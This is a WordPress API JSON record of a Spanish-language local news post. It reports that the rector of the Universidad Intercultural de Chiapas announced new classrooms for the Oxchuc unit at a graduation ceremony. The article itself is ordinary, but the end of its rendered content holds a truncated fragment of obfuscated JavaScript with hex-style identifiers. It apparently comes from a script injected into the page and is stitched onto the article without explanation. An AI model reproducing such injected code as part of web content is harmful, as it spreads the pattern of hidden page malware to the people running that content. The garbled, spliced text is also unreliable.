{"id":10775,"date":"2023-06-28T02:28:06","date_gmt":"2023-06-28T02:28:06","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=10775"},"modified":"2023-06-28T02:28:06","modified_gmt":"2023-06-28T02:28:06","slug":"uam-de-oxchuc-tendra-nuevas-instalaciones-rectora-de-la-unich","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=10775","title":{"rendered":"UAM de Oxchuc tendr\u00e1 nuevas instalaciones: Rectora de la UNICH"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/IMG-20230627-WA0272-1024x768.jpg\" alt=\"\" class=\"wp-image-10776\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/IMG-20230627-WA0272-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/IMG-20230627-WA0272-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/IMG-20230627-WA0272-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/IMG-20230627-WA0272.jpg 1152w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal 27 de Junio del 2023. Oxchuc.- La Rectora de la Universidad Intercultural de Chiapas (UNICH), Leticia Pons Bonals, anunci\u00f3 la construcci\u00f3n de nuevos edificios en la Unidad Acad\u00e9mica Multidisciplinaria de Oxchuc (UAM-Oxchuc) lo que beneficiar\u00e1 los estudiantes Tseltales, esto durante la graduaci\u00f3n que se realiz\u00f3 de la Generaci\u00f3n 2019-2023.\u201cEstamos muy contentos porque esta unidad ha venido creciendo, el pr\u00f3ximo semestre iniciar\u00e1 la construcci\u00f3n del nuevo edificio con ocho aulas, que podr\u00e1 dar los espacios suficientes, ya que actualmente resultan un poco incomodos, y ahora les permitir\u00e1 a los que contin\u00faan en esta unidad, tener espacios dignos y agradables para seguir construyendo sus experiencias de aprendizaje\u201d, dijo.Felicit\u00f3 a los 21 egresados de la Licenciatura en Lengua y Cultura, 10 de Desarrollo Sustentable y 8 de Derecho Intercultural, quienes culminan una etapa de su vida acad\u00e9mica, exhort\u00e1ndolos a regresar muy pronto, sum\u00e1ndose a algunas de las dos maestr\u00edas con las que cuenta esta casa de estudios Econom\u00eda Social y Solidaria (MESS) y Estudios Interculturales (MEI).Una vez concluida la ceremonia, Leticia Pons, agradeci\u00f3 al presidente concejal de Oxchuc, Luis S\u00e1ntiz G\u00f3mez, quienes se encuentran cubriendo los costos para el dictamen t\u00e9cnico de factibilidad de uso de suelo y uso de suelo condicionado, en los espacios donde ser\u00e1 edificado el nuevo edificio de esta unidad.Al evento de graduaci\u00f3n acudieron, Alma Rosa P\u00e9rez Trujillo, Secretaria Acad\u00e9mica de la UNICH; Abraham S\u00e1ntiz G\u00f3mez, Coordinador Acad\u00e9mico de la UAMO; Yolanda S\u00e1ntiz G\u00f3mez, Directora de la Casa de la Cultura, Oxchuc; Dana L\u00f3pez G\u00f3mez, Directora del CECYT Plantel 11 y Reynol Le\u00f3n Osorio. Director de la Escuela Secundaria T\u00e9cnica No. 31.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 27 de Junio del 2023. Oxchuc.- La Rectora de la Universidad Intercultural de Chiapas (UNICH), Leticia Pons Bonals, anunci\u00f3 la construcci\u00f3n de nuevos edificios en la Unidad Acad\u00e9mica Multidisciplinaria de Oxchuc (UAM-Oxchuc) lo que beneficiar\u00e1 los estudiantes Tseltales, esto durante la graduaci\u00f3n que se realiz\u00f3 de la Generaci\u00f3n 2019-2023.\u201cEstamos muy contentos porque &hellip;<\/p>\n","protected":false},"author":2,"featured_media":10776,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-10775","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10775","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10775"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10775\/revisions"}],"predecessor-version":[{"id":10777,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10775\/revisions\/10777"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/10776"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10775"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10775"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10775"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}